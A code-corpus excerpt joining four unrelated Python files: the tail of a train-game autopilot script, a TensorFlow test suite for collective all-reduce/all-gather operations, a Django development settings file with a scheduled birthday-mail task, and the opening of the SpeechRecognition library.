elif buzzer_value == (255, 255, 255):
print("ACTIVATING THE BUZZER")
pydirectinput.keyDown("t")
pydirectinput.keyUp("t")
else:
print("Autopilot is currently stopping.")
pydirectinput.keyDown("s")
time.sleep(5)
pydirectinput.keyUp("s")
pydirectinput.keyDown("t")
pydirectinput.keyUp("t")
elif distance <= 20 and m_distance == 0:
if lim >= 45:
print("Slowing down to prepare for station arrival.")
ignoreaws = True
ignorelim = True
throttle(currentThrottle, int((42 / max_speed) * 100))
else:
throttle(currentThrottle, limitThrottle)
else:
throttle(currentThrottle, limitThrottle)
except IndexError:
pass
solve = root.after(600, task)
checkChanges = None
def f_checkChanges():
global checkChanges
if newchange.value == True:
newchange.value = False
if active.value == True:
button.configure(bg="green")
root.after(600, task)
elif active.value == False:
button.configure(bg="red")
try:
root.after_cancel(solve)
except:
print("Error...")
checkChanges = root.after(2000, f_checkChanges)
checkChanges = root.after(2000, f_checkChanges)
def onClick():
if active.value == False:
active.value = True
button.configure(bg="green")
root.after(600, task)
else:
active.value = False
button.configure(bg="red")
root.after_cancel(solve)
button.configure(bg="red", command=onClick)
switchask = messagebox.askyesno(
"SCR-Autopilot", 'Autopilot is set up. Do you want to turn it on now? You can also turn it on or off by using the "AP" button on your screen.')
if switchask == True:
onClick()
root.mainloop()
|
collective_ops_test.py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for V2 Collective Operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
import time
from absl.testing import parameterized
from tensorflow.python.compat import v2_compat
from tensorflow.python.data.experimental.ops import testing as dataset_testing
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import test_util
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import collective_ops as _collective_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.platform import test
class CollectiveOpsV1(object):
all_reduce = _collective_ops.all_reduce
all_gather = _collective_ops.all_gather
class CollectiveOpsV2(object):
@staticmethod
def all_reduce(t, group_size, group_key, instance_key, *args, **kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
return _collective_ops.all_reduce_v2(t, group_size, group_key, instance_key,
*args, **kwargs)
@staticmethod
def all_gather(t, group_size, group_key, instance_key, *args, **kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
return _collective_ops.all_gather_v2(t, group_size, group_key, instance_key,
*args, **kwargs)
device_combination = (
combinations.combine(device='CPU', communication='RING', required_gpus=0) +
combinations.combine(
device='GPU', communication=['RING', 'NCCL'], required_gpus=2))
collective_op_combinations = combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce', CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather', CollectiveOpsV1.all_gather),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination)
@combinations.generate(
combinations.times(
combinations.combine(
collective_ops=[
combinations.NamedObject('v1', CollectiveOpsV1),
combinations.NamedObject('v2', CollectiveOpsV2)
],
mode='eager'), device_combination))
class CollectiveOpsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testReduce(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_all_reduce_1device():
with ops.device(dev0):
in_value = constant_op.constant([1.])
group_size = 1
group_key = 1
instance_key = 1
return collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def run_all_reduce_2devices():
in_value = constant_op.constant([1.])
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
self.assertAllClose(run_all_reduce_1device(), [1.], rtol=1e-5, atol=1e-5)
for result in run_all_reduce_2devices():
self.assertAllClose(result, [2.], rtol=1e-5, atol=1e-5)
def testGather(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_all_gather_1device():
with ops.device(dev0):
in_value = constant_op.constant([1.])
group_size = 1
group_key = 1
instance_key = 1
return collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def run_all_gather_2devices():
in_value = constant_op.constant([1.])
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
self.assertAllClose(run_all_gather_1device(), [1.], rtol=1e-5, atol=1e-5)
for result in run_all_gather_2devices():
self.assertAllClose(result, [1., 1.], rtol=1e-5, atol=1e-5)
def testInstanceKeyScopedUnderGroupKey(self, collective_ops, device,
communication):
if device == 'GPU' and context.num_gpus() < 4:
self.skipTest('not enough GPU')
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
dev2 = '/device:%s:2' % device
dev3 = '/device:%s:3' % device
@def_function.function
def run_all_reduce_4devices_same_instance_key():
# Use a common instance key for both groups.
instance_key = 0
# We will create 2 groups each with 2 devices.
group_size = 2
# Group 0 comprises dev0 and dev1.
group0_key = 0
# Group 1 comprises dev2 and dev3.
group1_key = 1
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(1.), group_size, group0_key, instance_key))
with ops.device(dev1):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(2.), group_size, group0_key, instance_key))
with ops.device(dev2):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(3.), group_size, group1_key, instance_key))
with ops.device(dev3):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(4.), group_size, group1_key, instance_key))
return collectives
results = run_all_reduce_4devices_same_instance_key()
self.assertAllClose(results[0], 3., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[1], 3., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[2], 7., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[3], 7., rtol=1e-5, atol=1e-5)
def testCollectiveGroupSizeOne(self, collective_ops, device, communication):
if communication == 'NCCL':
self.skipTest('b/170672646: it crashes with NCCL and group size one')
dev0 = '/device:%s:0' % device
group_size = 1
group_key = 100
instance_key = 100
in_value = [1., 2., 3., 4.]
in_tensor = constant_op.constant(in_value)
with ops.device(dev0):
reduced_tensor = collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
self.assertAllEqual(in_value, reduced_tensor.numpy())
with ops.device(dev0):
gathered_tensor = collective_ops.all_gather(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
self.assertAllEqual(in_value, gathered_tensor.numpy())
def testMultipleGroups(self, collective_ops, device, communication):
if device == 'GPU' and context.num_gpus() < 4:
self.skipTest('not enough GPU')
num_elements = 4
@def_function.function
def run_all_reduce(group_size, group_key):
instance_key = group_key
input_value = [float(group_key) for i in range(num_elements)]
collectives = []
for device_idx in range(group_size):
with ops.device('/{}:{}'.format(device, device_idx)):
input_tensor = constant_op.constant(input_value)
collectives.append(
collective_ops.all_reduce(
input_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
def run_and_assert(group_size, group_key):
for reduced_tensor in run_all_reduce(group_size, group_key):
self.assertAllEqual(
[float(group_key) * group_size for i in range(num_elements)],
reduced_tensor.numpy())
run_and_assert(group_size=2, group_key=1)
run_and_assert(group_size=3, group_key=2)
@combinations.generate(collective_op_combinations)
class AbortCollectiveOpsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testAbortGroupParamsResolution(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
# This hangs on params resolution since we're only launching one
# collective for a group size of 2.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
t.join()
# Reset the context in order to reset the collective executor.
_setup_context()
# After reset non-NCCL collectives should work.
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
def_function.function(collective_fn)()
def testAbortInstanceParamsResolution(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# First perform a normal all-reduce to complete the group resolution.
def_function.function(collective_fn)()
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
# Use a different instance key to trigger another instance resolution.
instance_key = 101
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
# This hangs on params resolution since we're only launching one
# collective for a group size of 2.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
context._reset_context() # pylint: disable=protected-access
t.join()
# Reset the context in order to reset the collective executor.
_setup_context()
# After reset non-NCCL collectives should work.
def_function.function(collective_fn)()
def testAbortCommunication(self, collective_op, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
# First perform a normal collective to finish resolution.
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
def_function.function(collective_fn)()
# Launch a collective that hangs, and abort the collective executor after
# the launch.
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# Reset the context in order to reset the collective executor.
t.join()
_setup_context()
def_function.function(collective_fn)()
class OpCancellationTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce',
CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather',
CollectiveOpsV1.all_gather),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
def testOpErrorNotAbortIfNoCollective(self, collective_op, device,
communication):
# Do not abort if there's no active collective ops. There could be
# exceptions like EOF which we expect users to catch, aborting collective
# ops on all op errors intervenes with this workflow.
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
dataset = dataset_ops.Dataset.from_tensors([1.])
@def_function.function
def collective_fn(in_tensor):
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def f():
iterator = iter(dataset)
collective_fn(next(iterator))
# This next(iterator) should raise EOF.
collective_fn(next(iterator))
with self.assertRaises(errors.OutOfRangeError):
f()
collective_fn(constant_op.constant([1.]))
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce',
CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_gather',
CollectiveOpsV1.all_gather),
],
mode='eager'), device_combination))
def testOpErrorAbortWithCollective(self, collective_op, device,
communication):
# Abort v1 collective ops if there're active collective ops at the time of
# an op error. This is due to the inability to cancel collective ops, and op
# errors may cause running collective ops to hang.
dev0 = '/device:%s:0' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
# Make the dataset sleep a while so that the collective is being executed
# when the EOF happens.
dataset = dataset_ops.Dataset.from_tensors([1.]).apply(
dataset_testing.sleep(sleep_microseconds=200))
@def_function.function
def f():
# Launch a collective op that won't be able to finish to test abortion
# when other ops error.
with ops.device(dev0):
ret = collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
iterator = iter(dataset)
next(iterator)
# This should raise EOF.
next(iterator)
return ret
with self.assertRaises(errors.OutOfRangeError):
f()
# Now collective ops is aborted, subsequent collective ops should fail with
# the previous error.
with self.assertRaises(errors.CancelledError):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
def testOpErrorNotAbortWithCollective(self, collective_op, device,
communication):
# Do not abort v2 collective ops even if there're active collective ops at
# the time of an op error. We rely cancellation to terminate active
# collective ops.
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
@def_function.function
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# Local params resolution cannot be cancelled yet, so we perform a normal
# collective so that the group is resolved.
collective_fn()
# Make the dataset sleep a while so that the collective is being executed
# when the EOF happens.
dataset = dataset_ops.Dataset.from_tensors([1.]).apply(
dataset_testing.sleep(sleep_microseconds=200))
@def_function.function
def f():
# Launch a collective op that won't be able to finish to test cancellation
# when other ops error.
with ops.device(dev0):
ret = collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
iterator = iter(dataset)
next(iterator)
# This should raise EOF.
next(iterator)
return ret
with self.assertRaises(errors.OutOfRangeError):
f()
# Collective ops shouldn't be aborted and new collectives should be able to
# proceed.
collective_fn()
@combinations.generate(collective_op_combinations)
class TimeoutTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testTimeout(self, collective_op, device, communication):
timeout = 1.5
@def_function.function
def run(group_size, reported_group_size=None):
group_key = 20
instance_key = 30
tensor = [1., 2., 3., 4.]
results = []
if reported_group_size is None:
reported_group_size = group_size
for i in range(group_size):
with ops.device('/{}:{}'.format(device, i)):
input_data = constant_op.constant(tensor)
result = collective_op(
input_data,
group_size=reported_group_size,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
results.append(result)
return results
run(2, 2)
start_time = time.time()
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
run(1, 2)
elapsed = time.time() - start_time
self.assertAllGreaterEqual(elapsed, timeout)
def testParamResolutionAfterTimeout(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
timeout = 1.5
group_key = 20
instance_key = 30
input_data = constant_op.constant([1., 2., 3., 4.])
# This timeout comes from param solution.
with self.assertRaisesRegex(
errors.DeadlineExceededError,
'Collective has timed out waiting for other workers'):
with ops.device(dev0):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# We launch the second device after the first device times out. This is to
# simulate the situation when other workers are slow and the timeout is
# short. It should error immediately.
with self.assertRaisesRegex(
errors.DeadlineExceededError,
'Collective has timed out waiting for other workers'):
with ops.device(dev1):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication)
def testExecutionAfterTimeout(self, collective_op, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
timeout = 1.5
group_key = 20
instance_key = 30
input_data = constant_op.constant([1., 2., 3., 4.])
@def_function.function
def run():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# Run a normal all-reduce to complete param resolution.
run()
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
with ops.device(dev0):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# We launch the second device after the first device times out. This is to
# simulate the situation when other workers are slow and the timeout is
# short. It should error immediately.
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
with ops.device(dev1):
# No timeout.
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication)
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
class OrderingTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testOrdering(self, collective_op, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
with ops.device(dev0):
token0 = resource_variable_ops.ResourceVariable(0.)
with ops.device(dev1):
token1 = resource_variable_ops.ResourceVariable(0.)
@def_function.function
def f():
# Launch the first collective with token.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token0.handle)
with ops.device(dev1):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token1.handle)
# Launch the second collective without token.
with ops.device(dev0):
collective_op(in_tensor, group_size, group_key, instance_key)
with ops.device(dev1):
collective_op(in_tensor, group_size, group_key, instance_key)
# Launch the third collective with token.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token0.handle)
with ops.device(dev1):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token1.handle)
graph = f.get_concrete_function().graph
for device in [dev0, dev1]:
# Try to find the third collective, which should have the first collective
# as a control input.
third = None
for op in graph.get_operations():
if (op.type.startswith('Collective') and op.device.endswith(device) and
op.control_inputs and
op.control_inputs[0].type.startswith('Collective')):
self.assertIsNone(third)
third = op
self.assertIsNotNone(third)
# Verify it's not the second collective by looking at the inputs.
self.assertTrue(any(v.dtype == dtypes.resource for v in third.inputs))
first = third.control_inputs[0]
self.assertEqual(third.device, first.device)
# Verify it's not the second collective by looking at the inputs.
self.assertTrue(any(v.dtype == dtypes.resource for v in first.inputs))
self.assertEmpty(first.control_inputs)
def _setup_context():
context._reset_context()
test_util.set_logical_devices_to_at_least('CPU', 4)
context.ensure_initialized()
if __name__ == '__main__':
v2_compat.enable_v2_behavior()
test.main()
|
settings_20210906113725.py
|
"""
Django settings for First_Wish project.
Generated by 'django-admin startproject' using Django 3.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
import environ
import threading
import schedule
import time
from First_Wish_Main_App.views import decrease_day_count_and_send_bday_mails
env_path = os.path.join(os.path.dirname(__file__), '../.env')
environ.Env.read_env(env_path)
# ///////////////////////////////SCHEDULE THE decrease_day_count_and_send_bday_mails ////////////////////
# Schedule the task at 00:01 everyday
schedule.every().day.at("11:38").do(decrease_day_count_and_send_bday_mails)
def func():
while True:
# print("======Runnning==========")
schedule.run_pending()
time.sleep(1)
t1 = threading.Thread(target=func)
t1.start()
# ///////////////////////////////SCHEDULE THE ENABLE BUTTON ENDS////////////////////
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
templates_path=os.path.join(BASE_DIR,'templates')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY =os.environ.get('DJANGO_SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'First_Wish_Main_App',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'First_Wish.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [templates_path],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'First_Wish.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Kolkata'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
]
|
__init__.py
|
#!/usr/bin/env python3
"""Library for performing speech recognition, with support for several engines and APIs, online and offline."""
import io
import os
import subprocess
import wave
import aifc
import math
import audioop
import collections
import json
import base64
import threading
import platform
import stat
import hashlib
import hmac
import time
import uuid
import tempfile
__author__ = "Anthony Zhang (Uberi)"
__version__ = "3.6.0"
__license__ = "BSD"
try: # attempt to use the Python 2 modules
from urllib import urlencode
from urllib2 import Request, urlopen, URLError, HTTPError
except ImportError: # use the Python 3 modules
from urllib.parse import urlencode
from urllib.request import Request, urlopen
from urllib.error import URLError, HTTPError
class WaitTimeoutError(Exception): pass
class RequestError(Exception): pass
class UnknownValueError(Exception): pass
class AudioSource(object):
def __init__(self):
raise NotImplementedError("this is an abstract class")
def __enter__(self):
raise NotImplementedError("this is an abstract class")
def __exit__(self, exc_type, exc_value, traceback):
raise NotImplementedError("this is an abstract class")
class Microphone(AudioSource):
"""
Creates a new ``Microphone`` instance, which represents a physical microphone on the computer. Subclass of ``AudioSource``.
This will throw an ``AttributeError`` if you don't have PyAudio 0.2.9 or later installed.
If ``device_index`` is unspecified or ``None``, the default microphone is used as the audio source. Otherwise, ``device_index`` should be the index of the device to use for audio input.
A device index is an integer between 0 and ``pyaudio.get_device_count() - 1`` (assume we have used ``import pyaudio`` beforehand) inclusive. It represents an audio device such as a microphone or speaker. See the `PyAudio documentation <http://people.csail.mit.edu/hubert/pyaudio/docs/>`__ for more details.
The microphone audio is recorded in chunks of ``chunk_size`` samples, at a rate of ``sample_rate`` samples per second (Hertz). If not specified, the value of ``sample_rate`` is determined automatically from the system's microphone settings.
Higher ``sample_rate`` values result in better audio quality, but also more bandwidth (and therefore, slower recognition). Additionally, some CPUs, such as those in older Raspberry Pi models, can't keep up if this value is too high.
Higher ``chunk_size`` values help avoid triggering on rapidly changing ambient noise, but also makes detection less sensitive. This value, generally, should be left at its default.
"""
def __init__(self, device_index=None, sample_rate=None, chunk_size=1024):
assert device_index is None or isinstance(device_index, int), "Device index must be None or an integer"
assert sample_rate is None or (isinstance(sample_rate, int) and sample_rate > 0), "Sample rate must be None or a positive integer"
assert isinstance(chunk_size, int) and chunk_size > 0, "Chunk size must be a positive integer"
# set up PyAudio
self.pyaudio_module = self.get_pyaudio()
audio = self.pyaudio_module.PyAudio()
try:
count = audio.get_device_count() # obtain device count
if device_index is not None: # ensure device index is in range
assert 0 <= device_index < count, "Device index out of range ({} devices available; device index should be between 0 and {} inclusive)".format(count, count - 1)
if sample_rate is None: # automatically set the sample rate to the hardware's default sample rate if not specified
device_info = audio.get_device_info_by_index(device_index) if device_index is not None else audio.get_default_input_device_info()
assert isinstance(device_info.get("defaultSampleRate"), (float, int)) and device_info["defaultSampleRate"] > 0, "Invalid device info returned from PyAudio: {}".format(device_info)
sample_rate = int(device_info["defaultSampleRate"])
except:
audio.terminate()
raise
self.device_index = device_index
self.format = self.pyaudio_module.paInt16 # 16-bit int sampling
self.SAMPLE_WIDTH = self.pyaudio_module.get_sample_size(self.format) # size of each sample
self.SAMPLE_RATE = sample_rate # sampling rate in Hertz
self.CHUNK = chunk_size # number of frames stored in each buffer
self.audio = None
self.stream = None
@staticmethod
def get_pyaudio():
"""
Imports the pyaudio module and checks its version. Throws exceptions if pyaudio can't be found or a wrong version is installed
"""
try:
import pyaudio
except ImportError:
raise AttributeError("Could not find PyAudio; check installation")
from distutils.version import LooseVersion
if LooseVersion(pyaudio.__version__) < LooseVersion("0.2.9"):
raise AttributeError("PyAudio 0.2.9 or later is required (found version {})".format(pyaudio.__version__))
return pyaudio
@staticmethod
def list_microphone_names():
"""
Returns a list of the names of all available microphones. For microphones where the name can't be retrieved, the list entry contains ``None`` instead.
The index of each microphone's name is the same as its device index when creating a ``Microphone`` instance - indices in this list can be used as values of ``device_index``.
"""
audio = Microphone.get_pyaudio().PyAudio()
try:
result = []
for i in range(audio.get_device_count()):
device_info = audio.get_device_info_by_index(i)
result.append(device_info.get("name"))
finally:
audio.terminate()
return result
def __enter__(self):
assert self.stream is None, "This audio source is already inside a context manager"
self.audio = self.pyaudio_module.PyAudio()
try:
self.stream = Microphone.MicrophoneStream(
self.audio.open(
input_device_index=self.device_index, channels=1,
format=self.format, rate=self.SAMPLE_RATE, frames_per_buffer=self.CHUNK,
input=True, # stream is an input stream
)
)
except:
self.audio.terminate()
raise
return self
def __exit__(self, exc_type, exc_value, traceback):
try:
self.stream.close()
finally:
self.stream = None
self.audio.terminate()
class MicrophoneStream(object):
def __init__(self, pyaudio_stream):
self.pyaudio_stream = pyaudio_stream
def read(self, size):
return self.pyaudio_stream.read(size, exception_on_overflow=False)
def close(self):
try:
# sometimes, if the stream isn't stopped, closing the stream throws an exception
if not self.pyaudio_stream.is_stopped():
self.pyaudio_stream.stop_stream()
finally:
self.pyaudio_stream.close()
class AudioFile(AudioSource):
"""
Creates a new ``AudioFile`` instance given a WAV/AIFF/FLAC audio file ``filename_or_fileobject``. Subclass of ``AudioSource``.
If ``filename_or_fileobject`` is a string, then it is interpreted as a path to an audio file on the filesystem. Otherwise, ``filename_or_fileobject`` should be a file-like object such as ``io.BytesIO`` or similar.
Note that functions that read from the audio (such as ``recognizer_instance.record`` or ``recognizer_instance.listen``) will move ahead in the stream. For example, if you execute ``recognizer_instance.record(audiofile_instance, duration=10)`` twice, the first time it will return the first 10 seconds of audio, and the second time it will return the 10 seconds of audio right after that. This is always reset to the beginning when entering an ``AudioFile`` context.
WAV files must be in PCM/LPCM format; WAVE_FORMAT_EXTENSIBLE and compressed WAV are not supported and may result in undefined behaviour.
Both AIFF and AIFF-C (compressed AIFF) formats are supported.
FLAC files must be in native FLAC format; OGG-FLAC is not supported and may result in undefined behaviour.
"""
def __init__(self, filename_or_fileobject):
assert isinstance(filename_or_fileobject, (type(""), type(u""))) or hasattr(filename_or_fileobject, "read"), "Given audio file must be a filename string or a file-like object"
